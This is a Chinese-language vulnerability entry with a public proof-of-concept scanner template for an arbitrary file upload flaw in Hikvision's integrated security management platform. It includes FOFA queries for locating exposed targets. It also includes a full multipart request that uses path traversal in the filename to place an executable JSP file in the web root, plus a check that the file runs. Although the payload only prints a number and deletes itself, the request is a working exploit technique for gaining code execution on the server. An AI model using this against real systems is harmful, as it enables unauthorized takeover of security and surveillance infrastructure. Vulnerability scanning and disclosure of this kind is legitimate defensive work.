漏洞描述
HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,获取服务器权限
FOFA: app="HIKVISION-综合安防管理平台"
FOFA: title="综合安防管理平台"
hikvision-anfang-report-fileupload-2: HiKVISION 综合安防管理平台 report 任意文件上传
PoC代码[已公开]
id: hikvision-anfang-report-fileupload-2
info:
name: HiKVISION 综合安防管理平台 report 任意文件上传
author: Observer
severity: critical
verified: true
description: |
HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,获取服务器权限
FOFA: app="HIKVISION-综合安防管理平台"
FOFA: title="综合安防管理平台"
reference:
- https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20files%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: hikvision,fileupload
created: 2023/10/10
set:
randstr: randomLowercase(10)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /svm/api/external/report
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"../../../tomcat85linux64.1/webapps/els/static/{{randstr}}.jsp\"\r\n\
Content-Type: application/zip\r\n\
\r\n\
<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
r1:
request:
method: GET
path: /els/static/{{randstr}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()